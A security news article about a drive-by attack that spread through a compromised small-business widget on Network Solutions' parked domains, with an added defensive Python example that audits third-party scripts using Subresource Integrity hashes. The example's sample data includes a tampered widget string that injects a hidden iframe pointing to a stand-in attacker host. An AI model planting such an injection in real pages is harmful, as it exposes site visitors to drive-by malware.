Mass Drive-By Attack Used Web Widget

Attackers took a different spin on mass infection and targeted hosting provider Network Solutions Inc.

A widespread Web attack discovered over the weekend that targeted Network Solutions Inc. customers' parked or "under construction" Web domains used a drive-by download attack that is harder to eradicate than the more common mass SQL injection attacks.

The attack, which began with an infected widget on NSI's growsmartbusiness.com website for small businesses, led to a mass infection of NSI customers' reserved domains, according to researchers at Armorize who spotted the attack.

NSI has since cleaned up its growsmartbusiness.com site and alerted its domain customers to remove the compromised widget, which offered tips for small businesses. Just how many NSI customers' domains remain infected is unclear: Researchers at Armorize, which first reported the attack over the weekend, say it infected at least 500,000 domains, or possibly millions, based on a Yahoo search the researchers conducted.

Network Solutions, however, disputes those numbers. "We have removed the widget from those pages and continue to check and monitor to ensure security. The number of impacted pages that have been reported publicly over the weekend is not accurate. We're still investigating the number of web pages affected," NSI posted on its website yesterday. "If you have downloaded the GrowSmartBusiness widget to your website, we recommend you delete that widget and scan your site for malware."

[UPDATE: NSI now says its preliminary analysis shows that fewer than 120,000 parked Web pages were hit. "No active Network Solutions customer websites were impacted. Additionally, there was also no compromise on our platform," NSI says in a new blog post.]

While the number of infected domains remains up for debate, the method used by the attackers to hit multiple domains was striking. Wayne Huang, co-founder and CTO at Armorize, says the attack method is a new breed of mass infection, or drive-by, attack. "I'm sure we're going to see more of it," he says.

But Neil Daswani, CTO and co-founder of Dasient, says he doesn't consider the attack waged on the NSI domains to be more sustainable or reliable. "It is very easy to mitigate and may not have as much of a significant impact -- it will only impact users that end up at a parked domain, usually by mistake or mistyping a legitimate domain name," says Daswani, whose firm recently conducted research on the use of widgets.

Dasient analyzed 5,000 websites and found that 75 percent of enterprises use third-party JavaScript widgets -- mostly travel, entertainment, and leisure websites running these apps, followed by publishing firms, high-tech companies, and financial institutions.

"Mass SQL injection against highly used and popular web applications could be more likely to help cybercriminals achieve a more significant malware distribution footprint," Daswani says.

Daswani also says widgets make an attractive attack target because one widget can be used by thousands of sites. "So even if widgets are not extremely vulnerable, an attacker that analyzes the cost/benefit trade-off may see that it is worthwhile to attack even a well-guarded widget because of the benefit they receive in terms of the number of sites they can turn into malware distribution vehicles," he says.
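Daswani's point is a supply-chain one: a widget script included by thousands of pages is one edit at its origin away from becoming a mass malware distribution channel, and NSI's own advice to affected customers was to delete the widget and scan the site. The following is an added example, not code from Armorize, Network Solutions or this article. It inventories the third-party scripts a page loads and checks each against a pinned Subresource Integrity (SRI) hash, so a widget altered at its host is reported (and, in a browser that enforces the integrity attribute, refused) rather than executed. The widget host widget.example.net, its URL, the script bodies and the page HTML are all constructed for illustration, and SRI is a later browser feature that was not available at the time of this attack.

```python
# Added example (not from Armorize, NSI or Dark Reading): list the third-party
# <script src=...> tags a page loads and verify each against a pinned
# Subresource Integrity (SRI) hash. Standard library only.
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collects every <script> tag that carries a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = {k.lower(): v for k, v in attrs}
        if a.get("src"):
            self.scripts.append({"src": a["src"], "integrity": a.get("integrity")})


def third_party_scripts(html, site_host):
    """Return the scripts whose host differs from the page's own host."""
    collector = ScriptCollector()
    collector.feed(html)
    found = []
    for s in collector.scripts:
        host = urlsplit(s["src"]).netloc.lower()   # "" for relative, same-site paths
        if host and host != site_host.lower():
            found.append({**s, "host": host})
    return found


def sri_hash(content, algo="sha384"):
    """SRI value for script bytes: "<algo>-<base64 digest>"."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content, integrity):
    """Same check a browser makes before running a script with integrity=."""
    algo, sep, _ = integrity.partition("-")
    if not sep or algo not in ("sha256", "sha384", "sha512"):
        return False
    return hmac.compare_digest(sri_hash(content, algo), integrity)


def audit_page(html, site_host, fetched):
    """Flag third-party scripts that are unpinned or fail their SRI check.
    `fetched` maps a script src to the bytes the widget host actually serves."""
    findings = []
    for s in third_party_scripts(html, site_host):
        if s["integrity"] is None:
            findings.append((s["src"], "no integrity attribute: host can change this script at will"))
        elif not sri_matches(fetched.get(s["src"], b""), s["integrity"]):
            findings.append((s["src"], "served content does not match pinned hash"))
    return findings


# Constructed sample: a parked page embedding a tips widget from a
# hypothetical host, plus the page's own same-site script.
WIDGET_URL = "http://widget.example.net/tips.js"
GOOD_WIDGET = b"document.write('<p>Tip of the day: back up your site.</p>');"
# Simulated compromise at the widget host: a hidden iframe is appended.
TAMPERED_WIDGET = GOOD_WIDGET + b"document.write('<iframe src=\"http://evil.example/\" width=0 height=0></iframe>');"


def page_html(pinned):
    """The parked page, with or without an SRI pin on the widget."""
    pin = f' integrity="{sri_hash(GOOD_WIDGET)}" crossorigin="anonymous"' if pinned else ""
    return f"""<html><body>
<script src="/js/site.js"></script>
<script src="{WIDGET_URL}"{pin}></script>
</body></html>"""


if __name__ == "__main__":
    served = {WIDGET_URL: TAMPERED_WIDGET}
    for pinned in (False, True):
        label = "pinned" if pinned else "unpinned"
        print(label, audit_page(page_html(pinned), "www.example.com", served))
```

The unpinned page yields a "no integrity attribute" finding even before the widget changes, which is the inventory a site owner needs in order to answer "do we embed this widget anywhere?" The pinned page is reported only once the host serves bytes that differ from the pin. The caveat is that SRI assumes a static script: a widget that legitimately changes requires re-pinning on every release, and a pin does nothing for pages the hosting provider itself assembles, as was the case with NSI's parked pages.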

Meanwhile, Armorize's Huang maintains that what sets this attack apart from the more commonly used mass SQL injection is that it's not a one-time infection. "A mass SQL injection is a one-time thing," Huang says. "This one has multiple backdoors all over the system ... the attacker can remove it and you don't know where the backdoor is unless you do a full IR [incident response] process ... It's very hard to clean up your system."

And the attackers went after a domain hosting provider to reach more sites more quickly. "This is a new type of mass infection -- infecting hosting companies," he says. "We saw a lot of Web hosting instances at the beginning of this year. When you compromise a hosting company, you can insert malware into a lot of sites all at once."

Users get infected merely by visiting a site with the infected widget. So far the researchers have seen the attack exploiting vulnerabilities in Internet Explorer. "They visit a page and end up with malware. There's absolutely no click and no user awareness of anything. They visit the page, the [exploit] attacks a vulnerability inside the browser and takes control of the browser," he says.

Then the attacker writes malicious code to the disk and executes it, he says. The researchers also found evidence that the attack fully compromised some websites, installing a Web "shell," essentially a control panel the attackers install once they have fully compromised a site.

"This allows you to do anything you'd like to do, insert any content," he says.

Huang and his team also discovered a second piece of malware on NSI's page: a fake instant messaging window that mimics that of an actual Chinese IM service, targeting users with IP addresses in Taiwan and Hong Kong, although a handful of U.S. and Chinese visitors also were hit, he says.

The attackers behind the drive-by attack on NSI's domains appear to be based in Asia. The attack ultimately sends users to phishing sites, Huang says. Armorize actually first saw the attack in May, when researchers found it on the Boingboing.com parked domain. "We didn't realize then that the entire NSI parked domain was infected," Huang says.

Armorize has published blog posts and demonstrations of the attacks.


Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing and Secure Enterprise.
